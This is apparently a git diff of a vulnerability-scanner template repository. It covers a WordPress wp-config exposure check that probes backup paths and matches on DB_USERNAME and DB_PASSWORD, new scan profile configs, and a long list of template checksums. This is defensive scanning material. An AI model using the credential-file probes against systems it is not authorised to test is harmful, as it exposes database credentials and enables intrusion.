||||
|
|
@ -2,8 +2,8 @@ id: wordpress-accessible-wpconfig
|
|||
|
||||
info:
|
||||
name: WordPress wp-config Detection
|
||||
author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n,tess,0xpugazh,mastercho
|
||||
severity: medium
|
||||
author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n,tess,0xpugazh,mastercho,c4sper0
|
||||
severity: high
|
||||
description: WordPress `wp-config` was discovered. This file is remotely accessible and its content available for reading.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
|
|
@ -49,6 +49,8 @@ http:
|
|||
- "/config.php.new"
|
||||
- "/common/config.php.new"
|
||||
- "/wp-config.php.bk"
|
||||
- "/home/{{DN}}WORDPRESS.txt"
|
||||
- "/home/{{DN}}-WORDPRESS.txt"
|
||||
|
||||
stop-at-first-match: true
|
||||
|
||||
|
|
@ -74,4 +76,4 @@ http:
|
|||
- "DB_USERNAME"
|
||||
- "DB_PASSWORD"
|
||||
condition: and
|
||||
# digest: 4b0a00483046022100e3482e35fafed169b3577d8894756ef07374b332c632601accbb8813b1ff2766022100f03dab57c516384fc14dc867db33cdb8d637b0fe33cf505de63f01c69c67b8f0:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100a15bddebdd77d968c7c0fcca60c08f9a364a6d3a3f984df3fe3b704976a69a07022100eea8defecc4f10f2257350fca0e63dbaff1c8c4b7f93262a5b8e553b23adfef4:922c64590222798bb761d5b6d8e72950
|
||||
|
|
@ -1,26 +1,13 @@
|
|||
# This is a configuration file for the bugbounty template profile.
|
||||
# This is a configuration file for the all template profile.
|
||||
# Additional configuration profiles can be created for different types of nuclei scans.
|
||||
# They should be placed under the 'config' directory at:
|
||||
# https://github.com/projectdiscovery/nuclei-templates
|
||||
# Here is an example of how to use a config profile:
|
||||
# nuclei -config config/bugbounty.yml -list target_list_to_scan.txt
|
||||
|
||||
severity:
|
||||
- critical
|
||||
- high
|
||||
- medium
|
||||
- low
|
||||
- unknown
|
||||
|
||||
# nuclei -config config/osint.yml -list target_list_to_scan.txt
|
||||
type:
|
||||
- http
|
||||
- tcp
|
||||
- javascript
|
||||
- dns
|
||||
- ssl
|
||||
|
||||
exclude-tags:
|
||||
- tech
|
||||
- dos
|
||||
- fuzz
|
||||
- creds-stuffing
|
||||
- token-spray
|
||||
- osint
|
||||
|
|
@ -0,0 +1,12 @@
|
|||
# This is a configuration file for the cves template profile.
|
||||
# Additional configuration profiles can be created for different types of nuclei scans.
|
||||
# They should be placed under the 'config' directory at:
|
||||
# https://github.com/projectdiscovery/nuclei-templates
|
||||
# Here is an example of how to use a config profile:
|
||||
# nuclei -config config/osint.yml -list target_list_to_scan.txt
|
||||
|
||||
templates:
|
||||
- http/cves/
|
||||
- http/cnvd/
|
||||
- network/cves/
|
||||
- javascript/cves/
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
# This is a configuration file for the default logins template profile.
|
||||
# Additional configuration profiles can be created for different types of nuclei scans.
|
||||
# They should be placed under the 'config' directory at:
|
||||
# https://github.com/projectdiscovery/nuclei-templates
|
||||
# Here is an example of how to use a config profile:
|
||||
# nuclei -config config/osint.yml -list target_list_to_scan.txt
|
||||
|
||||
templates:
|
||||
- http/default-logins/
|
||||
- network/default-login/
|
||||
- javascript/default-logins/
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
# This is a configuration file for the KEV template profile.
|
||||
# This is a configuration file for the CISA KEV template profile.
|
||||
# Additional configuration profiles can be created for different types of nuclei scans.
|
||||
# They should be placed under the 'config' directory at:
|
||||
# https://github.com/projectdiscovery/nuclei-templates
|
||||
|
|
|
|||
|
|
@ -0,0 +1,11 @@
|
|||
# This is a configuration file for the misconfigurations template profile.
|
||||
# Additional configuration profiles can be created for different types of nuclei scans.
|
||||
# They should be placed under the 'config' directory at:
|
||||
# https://github.com/projectdiscovery/nuclei-templates
|
||||
# Here is an example of how to use a config profile:
|
||||
# nuclei -config config/osint.yml -list target_list_to_scan.txt
|
||||
|
||||
templates:
|
||||
- http/misconfiguration/
|
||||
- network/misconfig/
|
||||
- javascript/misconfiguration/
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
# This is a configuration file for the subdomain takeover template profile.
|
||||
# Additional configuration profiles can be created for different types of nuclei scans.
|
||||
# They should be placed under the 'config' directory at:
|
||||
# https://github.com/projectdiscovery/nuclei-templates
|
||||
# Here is an example of how to use a config profile:
|
||||
# nuclei -config config/osint.yml -list target_list_to_scan.txt
|
||||
|
||||
templates:
|
||||
- http/takeovers/
|
||||
- dns/azure-takeover-detection.yaml
|
||||
- dns/elasticbeanstalk-takeover.yaml
|
||||
|
|
@ -88,14 +88,14 @@ cloud/aws/s3/s3-public-write-acp.yaml:3f2b36613d8008e1ac419f86a3986b6805958a39
|
|||
cloud/aws/s3/s3-public-write.yaml:f437b7481168279f14d743f6fcec2b07388e894e
|
||||
cloud/aws/s3/s3-server-side-encryption.yaml:5ad53f21b9bd0f6429456de397a4ecf6b45f5e24
|
||||
cloud/aws/s3/s3-versioning.yaml:bc4dadf7b83430d4f1d666bc0d61fff82bd0af1a
|
||||
cloud/aws/vpc/nacl-open-inbound.yaml:c37fc3d3cf8f958463cc9866508ae592b443f45f
|
||||
cloud/aws/vpc/nacl-outbound-restrict.yaml:2bf48e55f84c699328d7b6fa817ddaeeb2dd0bd1
|
||||
cloud/aws/vpc/nat-gateway-usage.yaml:1be291e02105543d5dd3e21ab16ad934f0378fdc
|
||||
cloud/aws/vpc/unrestricted-admin-ports.yaml:9ff885af43ee0f899f553eca7ede2dad946d9b7e
|
||||
cloud/aws/vpc/vpc-endpoint-exposed.yaml:b92e7486a3d12b8e7852462749cb2367100d9bf1
|
||||
cloud/aws/vpc/vpc-endpoints-not-deployed.yaml:b9a8f1c8578f6fa44a539f3f728f7166a71923b3
|
||||
cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml:9e579ae244c162e6fa5b27348290079e1c9a5008
|
||||
cloud/aws/vpc/vpn-tunnel-down.yaml:5151f54f14688d396709d5c2d16c3c7b087e2d4b
|
||||
cloud/aws/vpc/nacl-open-inbound.yaml:4117d3d0d468f9b723f63cd36a964cd73f82e76f
|
||||
cloud/aws/vpc/nacl-outbound-restrict.yaml:dccc34edf2429e53bef902b6979e52418b415c14
|
||||
cloud/aws/vpc/nat-gateway-usage.yaml:c292fbd2ca07a84b1c10d83cce119c2a024fb800
|
||||
cloud/aws/vpc/unrestricted-admin-ports.yaml:3364c4aaa26cd2252bab903ac561fd8eb2fd2314
|
||||
cloud/aws/vpc/vpc-endpoint-exposed.yaml:b5517ee9213554b46ac6ed3064f8e78adbab0108
|
||||
cloud/aws/vpc/vpc-endpoints-not-deployed.yaml:1ddc0bac11e1c8827ae10389e8fb35444f8a0a82
|
||||
cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml:962bdc88135be9ba9328fd7fd9ad52d26c1fed6b
|
||||
cloud/aws/vpc/vpn-tunnel-down.yaml:427ec306b6366a932a6a2c0c0d6f45b8ebf850de
|
||||
cloud/enum/aws-app-enum.yaml:61abc31cc0ae208df9ed070e7d238edde3e82f48
|
||||
cloud/enum/aws-s3-bucket-enum.yaml:0d101b898bbaebceea4020963d11829f8167029f
|
||||
cloud/enum/azure-db-enum.yaml:1a84da310edfa148667be811a8f749b93a263d0a
|
||||
|
|
@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd
|
|||
code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17
|
||||
code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9
|
||||
contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159
|
||||
cves.json:093496181a54e1ca8a72dc3e80f1a16d953eba11
|
||||
cves.json-checksum.txt:82d1c1b8bbfab0b5f72989fb3c58fe16109c7de3
|
||||
cves.json:0820bc134ca52d7071cc8c6596b3ac37a095a0ae
|
||||
cves.json-checksum.txt:996eafaef74b06977788950a04aeebf48b096611
|
||||
dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22
|
||||
dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396
|
||||
dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e
|
||||
|
|
@ -451,7 +451,7 @@ file/malware/bozok-malware.yaml:b997aa419b2d0ce9c6edf79c9031e4e943fd79a7
|
|||
file/malware/bublik-malware.yaml:1ca6a30e1865b979a297ee0f5c92878ba68b57bb
|
||||
file/malware/cap-hookexkeylogger-malware.yaml:6622fc9690427fb8d818e84d47bd268f49253261
|
||||
file/malware/cerber-malware.yaml:8d600a1106a51bcd2709c8156127741cfbb5d0f5
|
||||
file/malware/cerberus-malware.yaml:38966c3659344648f0dcf0eab98da65e0024bfe5
|
||||
file/malware/cerberus-malware.yaml:74b8c9a01b459e4eb65c460d32d7d149bfe54334
|
||||
file/malware/clientmesh-malware.yaml:3450451cee310b336b87f7380015172d8c8b1e90
|
||||
file/malware/crimson-malware.yaml:a882939cc1854f5853ab7b79bb7e263302507316
|
||||
file/malware/crunchrat-malware.yaml:9700327529d967b11598c0d9550db4d5fb3ecf91
|
||||
|
|
@ -855,7 +855,7 @@ http/cnvd/2020/CNVD-2020-63964.yaml:e340531566025fec2a69c5b211366d34aabebdbf
|
|||
http/cnvd/2020/CNVD-2020-67113.yaml:b6ed5ca5c479927c2d267a6beb708bdc782c1b8a
|
||||
http/cnvd/2020/CNVD-2020-68596.yaml:4a1c644954b7d789b503a390644acfc1c459e1dc
|
||||
http/cnvd/2021/CNVD-2021-01931.yaml:16f6c167f58030d3042772280faea486e8e19a7d
|
||||
http/cnvd/2021/CNVD-2021-09650.yaml:cd2f4b8a579018a3035fc7ec94d1802ff6e1a276
|
||||
http/cnvd/2021/CNVD-2021-09650.yaml:c52190bcf210a731366792c944c5bfe8272296a8
|
||||
http/cnvd/2021/CNVD-2021-10543.yaml:c1026547067fb7f3dd5601f3f71eec8793222778
|
||||
http/cnvd/2021/CNVD-2021-14536.yaml:78b9c1a700aedb16c09fb174f3a2b87361e4d757
|
||||
http/cnvd/2021/CNVD-2021-15822.yaml:2d07bfd7e2578a3cb23bf8d3efb74adf85abd035
|
||||
|
|
@ -1183,6 +1183,7 @@ http/cves/2015/CVE-2015-4063.yaml:82f243448aa7204d9d610679fb10f817dbb54750
|
|||
http/cves/2015/CVE-2015-4074.yaml:065fb740afd3068b6d1e46df88070d26b6ce45e0
|
||||
http/cves/2015/CVE-2015-4127.yaml:544be4829bf72ee7d73cc4cb7f47f3fd3f1ae01c
|
||||
http/cves/2015/CVE-2015-4414.yaml:d62aaf0ccbf4332dd956ee3fa625dfef380e07cd
|
||||
http/cves/2015/CVE-2015-4455.yaml:c9428c8c8a30af5dfb87b2b89927f3ce1ba7b554
|
||||
http/cves/2015/CVE-2015-4632.yaml:d062862654959446af1cb7bdb1e5ff2ff029510e
|
||||
http/cves/2015/CVE-2015-4666.yaml:846d0baaf39e9f004c072d698ff122871460f68e
|
||||
http/cves/2015/CVE-2015-4668.yaml:2b4888f257c6dc0cba9ee277c343475ea06da19f
|
||||
|
|
@ -1667,6 +1668,7 @@ http/cves/2019/CVE-2019-6340.yaml:c0e85bf4c7d5a44b6a2288baf33daa21966dc5c3
|
|||
http/cves/2019/CVE-2019-6715.yaml:3e335ffc1bb0e3d32a7755cbeb02535407298af7
|
||||
http/cves/2019/CVE-2019-6799.yaml:86e0107a33657c4a446eae5ee6544633801be073
|
||||
http/cves/2019/CVE-2019-6802.yaml:04678947a8f58198df25d0b489029618cca2caff
|
||||
http/cves/2019/CVE-2019-7139.yaml:9ce4e6a9da54dabf3d98d063111cc7e8d337fef7
|
||||
http/cves/2019/CVE-2019-7192.yaml:40ab1445f19dcd09322617d418a9612eea02bac9
|
||||
http/cves/2019/CVE-2019-7219.yaml:6372986a8f04b8ace9c02f4973e0ee15ee51e08a
|
||||
http/cves/2019/CVE-2019-7238.yaml:78115715b771474b691df0757ad350bd6dac77ca
|
||||
|
|
@ -2821,7 +2823,7 @@ http/cves/2022/CVE-2022-4320.yaml:85df1be119e20f7dd54ec90fe4f29813ec89fc90
|
|||
http/cves/2022/CVE-2022-4321.yaml:18451ef7ed2083de058c2fc773cd4c0df5a2b383
|
||||
http/cves/2022/CVE-2022-4325.yaml:f186020c216cd067428f78142dc9637ac51c3ec8
|
||||
http/cves/2022/CVE-2022-4328.yaml:027d49a96bd49b38b06c63fe56e85df269c0af27
|
||||
http/cves/2022/CVE-2022-43769.yaml:c6a4115aa490d6bea5d94d4fd5313fafebf2ba56
|
||||
http/cves/2022/CVE-2022-43769.yaml:c486a19621f831f2ff911d73ccaabea6d3cd160c
|
||||
http/cves/2022/CVE-2022-44290.yaml:c603b4cdf73c9b70df220546fb645d454fbfd368
|
||||
http/cves/2022/CVE-2022-44291.yaml:50e4b9fef3f63a6f1166f23761c05ecea1412bbb
|
||||
http/cves/2022/CVE-2022-4447.yaml:c9d25f4aa9bb183e694aeaf192aef082aaa8488d
|
||||
|
|
@ -2953,7 +2955,7 @@ http/cves/2023/CVE-2023-24733.yaml:8c12c7187efcc4652bb7bf6bb0069cbe8762fc0d
|
|||
http/cves/2023/CVE-2023-24735.yaml:35b457aeb699de6d59519aff249be662b70d4a37
|
||||
http/cves/2023/CVE-2023-24737.yaml:facc801d9eca13c7392c35caa520fb642f0c5971
|
||||
http/cves/2023/CVE-2023-2479.yaml:e380c2326f30db012e6a091a9a20bd2c9c56b0cd
|
||||
http/cves/2023/CVE-2023-25135.yaml:123ab210e4561811b02eecec4b99eb2402772773
|
||||
http/cves/2023/CVE-2023-25135.yaml:8a3b6d23aac32527511e347c7212b8f8a227117b
|
||||
http/cves/2023/CVE-2023-25157.yaml:a47b8df2e4f9871518e24d36431cc36466e35e36
|
||||
http/cves/2023/CVE-2023-25194.yaml:754c9c257413b4590237bd3a90e17393dace3436
|
||||
http/cves/2023/CVE-2023-25346.yaml:fca6cb7b61b9f36d5aaed4cc545a276e354c490d
|
||||
|
|
@ -2970,6 +2972,7 @@ http/cves/2023/CVE-2023-2648.yaml:41ec7f7a05226cc4b5805c7b3018d5d492f21343
|
|||
http/cves/2023/CVE-2023-26842.yaml:a8e888fe71856500458f993a7623c95a5acf2d34
|
||||
http/cves/2023/CVE-2023-26843.yaml:a29e22aabb4f3c623854b0e2f79c6aaba42bd323
|
||||
http/cves/2023/CVE-2023-27008.yaml:99b72f80285fcea1ca809221940b6dd32a511432
|
||||
http/cves/2023/CVE-2023-27032.yaml:ff5f86063146df89d119061535c3d6cfa9c74474
|
||||
http/cves/2023/CVE-2023-27034.yaml:e2c1ce7882a10ef1b7e9126950304588d00ff267
|
||||
http/cves/2023/CVE-2023-27159.yaml:2687d77e90b419ac3a52ddc4e837eeb6135a6da6
|
||||
http/cves/2023/CVE-2023-27179.yaml:37e8c6b241909fc9025935c171317ee092f9b206
|
||||
|
|
@ -2990,7 +2993,7 @@ http/cves/2023/CVE-2023-2796.yaml:a25d85c244928e675267d06c4976d84d1a72d3d3
|
|||
http/cves/2023/CVE-2023-28121.yaml:49ee6dc575ca492684912f95dbcc8810f3f29de0
|
||||
http/cves/2023/CVE-2023-2813.yaml:485032b8c58efb4cdeb458a4387374d6faa9c4c5
|
||||
http/cves/2023/CVE-2023-2822.yaml:b638b609770d15a230fa7246f171a5a654bce03e
|
||||
http/cves/2023/CVE-2023-2825.yaml:05c22f1ab260687827e98d9eddab16c82012cc8e
|
||||
http/cves/2023/CVE-2023-2825.yaml:e52fcd86c715c973f0d368fec0a8bbe61a0aa3ac
|
||||
http/cves/2023/CVE-2023-28343.yaml:c781cd98e3899efad10ad98e84ccad6bb0d2435c
|
||||
http/cves/2023/CVE-2023-28432.yaml:257ea32d858fb24d05fd61158b2c57b3ce5766f1
|
||||
http/cves/2023/CVE-2023-28662.yaml:146d269965800ab6ea40ae0c05bb94f1bcacceb1
|
||||
|
|
@ -3026,6 +3029,7 @@ http/cves/2023/CVE-2023-31059.yaml:2f55ef6a46f15bb784839290fdc7a1a536472c36
|
|||
http/cves/2023/CVE-2023-31446.yaml:0ba3222752c4cc2de6941cdce24a66042f78e1c3
|
||||
http/cves/2023/CVE-2023-31465.yaml:6bd33dcdf6008201a427dc26394290cd8a743bee
|
||||
http/cves/2023/CVE-2023-31548.yaml:2c5cbc65c0eccc342f8a64e1446f235eb72859a9
|
||||
http/cves/2023/CVE-2023-32077.yaml:209f5ecaac978f98f6002f5813e39d9f49226d5c
|
||||
http/cves/2023/CVE-2023-32117.yaml:46d14910cd14a3227dec95d78a2dc4262eba249b
|
||||
http/cves/2023/CVE-2023-3219.yaml:30c6a139afeb951daf2ed2734dcae25ef3db05ca
|
||||
http/cves/2023/CVE-2023-32235.yaml:97088e4dd3fc67bdf37659084e1c32fdb2670818
|
||||
|
|
@ -3051,7 +3055,7 @@ http/cves/2023/CVE-2023-34362.yaml:5e6a1ddcdf96d45153174df95d001082d9e22b1c
|
|||
http/cves/2023/CVE-2023-34537.yaml:ce2b42c314ea85f2cf7f4081e19600bcd2c5db7c
|
||||
http/cves/2023/CVE-2023-34598.yaml:90635e327c11d10e4dfc2da81ff445a669d976fb
|
||||
http/cves/2023/CVE-2023-34599.yaml:252d4509a26d36ab69876630693c3bf216802eb3
|
||||
http/cves/2023/CVE-2023-3460.yaml:02b8c5ee36c2524dc11a93652b0652232ec3876f
|
||||
http/cves/2023/CVE-2023-3460.yaml:88688540a54e02217069f7359cdbe3ddfde15289
|
||||
http/cves/2023/CVE-2023-34659.yaml:752f2d986befb41386fb76463ee258482a720d80
|
||||
http/cves/2023/CVE-2023-34751.yaml:725022730026691d6d788f2e23664b9068db36a6
|
||||
http/cves/2023/CVE-2023-34752.yaml:e188543250435b6a6dc5e1082a9cdb02a17bc5f5
|
||||
|
|
@ -3102,6 +3106,7 @@ http/cves/2023/CVE-2023-3848.yaml:626c7451b8a7417718cdc68024755692bb45b6af
|
|||
http/cves/2023/CVE-2023-3849.yaml:fc829971129fd5dd0e9f5efefcc0f9a8ce81db52
|
||||
http/cves/2023/CVE-2023-38501.yaml:105e3431e6c0c3cc63a89c92edd808e0e21ea0d8
|
||||
http/cves/2023/CVE-2023-38646.yaml:64213f51ae213555592207527e163a41e82c66ab
|
||||
http/cves/2023/CVE-2023-38964.yaml:03b48ad92119668fb6e83bb4d65f686be71735de
|
||||
http/cves/2023/CVE-2023-39002.yaml:6b28884d827963d2b420ca0054935711ae4e7ac7
|
||||
http/cves/2023/CVE-2023-39026.yaml:a51a79a6eb674c4075565e9dbbc5e77ecce8b8d3
|
||||
http/cves/2023/CVE-2023-39108.yaml:692192b618ece9c517379af9e65f86f9b29bf882
|
||||
|
|
@ -3146,6 +3151,7 @@ http/cves/2023/CVE-2023-42442.yaml:f9d27d085afe82b96452ceaccf7be30e9a2202f9
|
|||
http/cves/2023/CVE-2023-42793.yaml:a842d71c8b60488cd3dc70eb328d5b70050216bf
|
||||
http/cves/2023/CVE-2023-43177.yaml:5952017087ab37bcfce0de1edfc977ccdca951f4
|
||||
http/cves/2023/CVE-2023-43187.yaml:9114ac2207f9c442f7a20843775a6f3d8d47a64f
|
||||
http/cves/2023/CVE-2023-43208.yaml:fe7941493bcf8b59fd55d2e57288bbb985cf2d65
|
||||
http/cves/2023/CVE-2023-43261.yaml:4e229f26b444802b453164764a7f455c69bbcb56
|
||||
http/cves/2023/CVE-2023-43325.yaml:7849edeca0eb8481c4a3aed6c3589196b6cef4a6
|
||||
http/cves/2023/CVE-2023-43326.yaml:57d65b95951cc3b5e326ad3790f27d15e83d3a4d
|
||||
|
|
@ -3154,6 +3160,9 @@ http/cves/2023/CVE-2023-4415.yaml:21b79187558e4d88b2c453cfe6c99cc13c84fccb
|
|||
http/cves/2023/CVE-2023-44352.yaml:838f6b730d02b9335f6e41cfa6f1e28ab7c3828e
|
||||
http/cves/2023/CVE-2023-44353.yaml:34be9ca42f557484dff5d8434d1e34b192299eb3
|
||||
http/cves/2023/CVE-2023-4451.yaml:3201ce3e57a6ef644539ab1fcc4a1d0e37f8b542
|
||||
http/cves/2023/CVE-2023-44812.yaml:ace18635165e58ee989f1932f19dcd3e6eb8a166
|
||||
http/cves/2023/CVE-2023-4521.yaml:e6cc9b5d3082e84529113381bd012c5a16a5a35b
|
||||
http/cves/2023/CVE-2023-45375.yaml:e9a83c1c9c55540677f50b89260a2df23d3c2c6e
|
||||
http/cves/2023/CVE-2023-4547.yaml:a6e77eeb6c623c0317df91820a3523b09d8b05d5
|
||||
http/cves/2023/CVE-2023-45542.yaml:8a9af0dceceac9809c1a2971d0600b81071ec0f2
|
||||
http/cves/2023/CVE-2023-45671.yaml:dd4754dca2d4d037d911c6a7200d2a83cd81bbcf
|
||||
|
|
@ -3161,6 +3170,7 @@ http/cves/2023/CVE-2023-4568.yaml:b55a87816a7145a42fa228dfe704da4572d5044e
|
|||
http/cves/2023/CVE-2023-45852.yaml:121fe7235b0b17c24564aabf8701636466e6c686
|
||||
http/cves/2023/CVE-2023-4596.yaml:2f579cfedfcc066453d4d03b303efa1505fcc2cb
|
||||
http/cves/2023/CVE-2023-4634.yaml:a27a590c0501711f8c63e214ca7d76c1b3e7bef1
|
||||
http/cves/2023/CVE-2023-46347.yaml:78b9ee5474f96b6390c07647e986fe9bc0ab2e96
|
||||
http/cves/2023/CVE-2023-46359.yaml:2c5eadff5358c49c151934a282621b2bfce3bf92
|
||||
http/cves/2023/CVE-2023-46574.yaml:3ee23f056a218c79387d3ae1c3cdbb51aeba5191
|
||||
http/cves/2023/CVE-2023-46747.yaml:b010f6e5c18a3f337a7f2e266f9330a39635d36c
|
||||
|
|
@ -3179,6 +3189,7 @@ http/cves/2023/CVE-2023-4966.yaml:14102dfbda787ccbbd24875179e48acbdae04643
|
|||
http/cves/2023/CVE-2023-4973.yaml:fd42b4708183812b84a950edadb28cd74acf7664
|
||||
http/cves/2023/CVE-2023-4974.yaml:d7a5386c5971e13babc28e9f346991ef0e82fba2
|
||||
http/cves/2023/CVE-2023-49785.yaml:37c94b4ef0f6b07d703d372d1e5a0841e9a3184e
|
||||
http/cves/2023/CVE-2023-5003.yaml:f7da2dff91d97d8c63abb7faf35019a0bb73906a
|
||||
http/cves/2023/CVE-2023-50290.yaml:993704655d9bb469f8ea073c9757676b3ee1468f
|
||||
http/cves/2023/CVE-2023-5074.yaml:7b27fc2c3a6ecd3375ca4faf384c14cc480f859c
|
||||
http/cves/2023/CVE-2023-5089.yaml:143e9400b53b44e4fca7cdd97d47add25ac940b6
|
||||
|
|
@ -3202,6 +3213,7 @@ http/cves/2023/CVE-2023-6114.yaml:fb42b31775be2bbad24ddc15474b08d1d5a14341
|
|||
http/cves/2023/CVE-2023-6360.yaml:02f33c56e0b2c876afb8067605ecea59372947b6
|
||||
http/cves/2023/CVE-2023-6379.yaml:6ebc677324ecc29a9012474f6228f27be950dee0
|
||||
http/cves/2023/CVE-2023-6380.yaml:24e6506046fab035c83ce942b572d9389c88df15
|
||||
http/cves/2023/CVE-2023-6389.yaml:a7849d4aba637c66da0d3d08b08158b6ccfcd27d
|
||||
http/cves/2023/CVE-2023-6553.yaml:7976983a9d94d1562386621c7528c4e1af07ee89
|
||||
http/cves/2023/CVE-2023-6567.yaml:83818566ad0764aa9933b7f1905075c40b645479
|
||||
http/cves/2023/CVE-2023-6623.yaml:182c33805efba63a9f987417b6e13ce81c8643e9
|
||||
|
|
@ -3211,12 +3223,15 @@ http/cves/2023/CVE-2023-6875.yaml:2e8817b2133461b7fdb1b0d59f4c197202c3bd60
|
|||
http/cves/2023/CVE-2023-6895.yaml:9f63f7d60c0a07f24f11688a0021a925aafa4c26
|
||||
http/cves/2023/CVE-2023-6909.yaml:4562cfd57e05ece355b437b64b4925db7a04472f
|
||||
http/cves/2023/CVE-2023-6977.yaml:427980251fa5fcdbdfa28dceed9f7fd1e0c17158
|
||||
http/cves/2023/CVE-2023-6989.yaml:d00f0a2249e0bde6f0803f5bb7884544e5cadfd4
|
||||
http/cves/2023/CVE-2023-7028.yaml:16a6a22a93bf8caea281ec34d32def83f8e06fac
|
||||
http/cves/2024/CVE-2024-0204.yaml:39634c8661238823c08664b0a4720f98fef14e49
|
||||
http/cves/2024/CVE-2024-0235.yaml:14f7242039b69741ffd3e1585a856862479d1ffe
|
||||
http/cves/2024/CVE-2024-0305.yaml:f9c1488139a1e3dbd686ae698b0761ff93ec0dd8
|
||||
http/cves/2024/CVE-2024-0337.yaml:a0259282bfc67ee1b2339ea3af3bd295baa59cc3
|
||||
http/cves/2024/CVE-2024-0352.yaml:e324d6ccb69d2bee50aa487f5e068cc005c715d8
|
||||
http/cves/2024/CVE-2024-0713.yaml:391fe60dbb13edaff0fb693b1b25fb71dcfb0241
|
||||
http/cves/2024/CVE-2024-0881.yaml:a827b28c2e217c38e6a44902abf23f5df53bb437
|
||||
http/cves/2024/CVE-2024-1021.yaml:a48c4dce997dffd7ee3b988bc0dc646f2cf840d7
|
||||
http/cves/2024/CVE-2024-1061.yaml:86d3c132707db27f265ffc55e9a5897dd6b03fd0
|
||||
http/cves/2024/CVE-2024-1071.yaml:f9280444cf13a8677b365b28c1bf7cd991829d9c
|
||||
|
|
@ -3232,11 +3247,15 @@ http/cves/2024/CVE-2024-21644.yaml:2156925d0fe7c84d0e8b43f7681bcd2409386996
|
|||
http/cves/2024/CVE-2024-21645.yaml:5bd013f892b97ec56eefc5dc0b423d8b62e66864
|
||||
http/cves/2024/CVE-2024-21887.yaml:9e4e007bba9354b143ea5c286d57142e4a967673
|
||||
http/cves/2024/CVE-2024-21893.yaml:fbd24aa08d6ee9e7b7c2a235810f1b6ee65aad1a
|
||||
http/cves/2024/CVE-2024-22024.yaml:8f8fbb852668db0a337fbc6e9046e4a05c458be1
|
||||
http/cves/2024/CVE-2024-22024.yaml:36f71684ca8bef143db91384fa7437000786c8b0
|
||||
http/cves/2024/CVE-2024-22319.yaml:089e73d8633f14ef54b24a562f3c6a81e7e85b2d
|
||||
http/cves/2024/CVE-2024-22320.yaml:161fb9579017c222d6792c1dcc6a9223edecdcdb
|
||||
http/cves/2024/CVE-2024-22927.yaml:55eada76a32a5cb2d7c30cebb426f9efb40a0c7c
|
||||
http/cves/2024/CVE-2024-23334.yaml:c7735b96c11cb5fb87ede7ad978c21a2e2bb2bbe
|
||||
http/cves/2024/CVE-2024-2340.yaml:bf15cb04b444f7c09b0602e12e9bb3c77cd7ecf7
|
||||
http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07
|
||||
http/cves/2024/CVE-2024-23917.yaml:91acf4a916db564da116aad3221f1a662477c3ed
|
||||
http/cves/2024/CVE-2024-24131.yaml:71f3b885b69ae4e2beffc8df3a036dcfc75a8cba
|
||||
http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05
|
||||
http/cves/2024/CVE-2024-25669.yaml:970b706816344e71cfc971f7e2b69be44296cd81
|
||||
http/cves/2024/CVE-2024-25735.yaml:f7694e6ddea1f334810c1f92161b65fe17c5881c
|
||||
|
|
@ -3246,15 +3265,27 @@ http/cves/2024/CVE-2024-27199.yaml:6004f38f3a24fbb3a951270191c4af21b6e14e2d
|
|||
http/cves/2024/CVE-2024-27497.yaml:60398b33810f93340a2641b108c2ed83ed635e88
|
||||
http/cves/2024/CVE-2024-27564.yaml:59fbfb7c059d110b9a807d0d2205058ae1326e6b
|
||||
http/cves/2024/CVE-2024-27954.yaml:fe69ea721d3341747af165f3378e4f8bedb2ff43
|
||||
http/cves/2024/CVE-2024-27956.yaml:6642a8487441523926a0828c54b333ba9737522f
|
||||
http/cves/2024/CVE-2024-28255.yaml:dd2f4a52d0d4f9af3c6a6fc10a917e99e8f0717d
|
||||
http/cves/2024/CVE-2024-28734.yaml:a21288b4f390a5aea56ed3660da93b8fed589096
|
||||
http/cves/2024/CVE-2024-2876.yaml:33b7f45b1e5e63e6936315618a667d8cd07d054b
|
||||
http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841
|
||||
http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a
|
||||
http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc
|
||||
http/cves/2024/CVE-2024-3136.yaml:5fed158063381326ca7336af0dc0c43ed317883d
|
||||
http/cves/2024/CVE-2024-31621.yaml:c018e5f982f789c5e23e7d94ff0f72baed228730
|
||||
http/cves/2024/CVE-2024-31849.yaml:38ee32ca8fe1a5378feb218852477eb6460e62ea
|
||||
http/cves/2024/CVE-2024-31850.yaml:e6fdbf6bb6829c0afd6fa7027b68b859f301d1ba
|
||||
http/cves/2024/CVE-2024-31851.yaml:75629a1e21a26e599dce39fcf8272cf24236cacf
|
||||
http/cves/2024/CVE-2024-32399.yaml:313686632b5766a7b54093c4c7201abe93e487e6
|
||||
http/cves/2024/CVE-2024-3273.yaml:ba09cef76e7e1002ae6d72d3d9b670f09562ca9b
|
||||
http/cves/2024/CVE-2024-32640.yaml:0aea7a618e8eba9f193f25c129d1d03e3bb15921
|
||||
http/cves/2024/CVE-2024-32651.yaml:923d99a00afdb05df7e401f31ce5950112b31890
|
||||
http/cves/2024/CVE-2024-3273.yaml:a3f9f69c4c7f4f6e45f66d06fead2fb61338db17
|
||||
